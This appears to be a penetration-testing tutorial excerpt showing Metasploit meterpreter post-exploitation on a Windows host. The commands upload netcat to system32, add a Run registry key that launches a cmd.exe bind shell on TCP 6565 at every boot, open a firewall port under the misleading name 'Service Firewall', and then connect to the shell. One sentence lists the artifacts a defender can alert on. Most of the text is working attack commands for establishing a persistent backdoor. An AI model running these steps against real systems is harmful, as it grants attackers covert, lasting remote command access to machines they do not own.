meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 6565 -e cmd.exe
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
meterpreter > execute -f cmd -i
C:\Documents and Settings\bloggins\My Documents > netsh firewall show opmode
C:\Documents and Settings\bloggins\My Documents > netsh firewall add portopening TCP 6565 "Service Firewall" ENABLE ALL
C:\Documents and Settings\bloggins\My Documents > netsh firewall show portopening
Reboot the remote system and test the netcat shell. Note that every step above leaves a host-level artifact a defender can baseline and alert on: the new `nc` value under the `Run` key, `nc.exe` dropped into `system32`, and a firewall rule named "Service Firewall" opening TCP 6565.
root@bt:~# nc -v 172.16.104.128 6565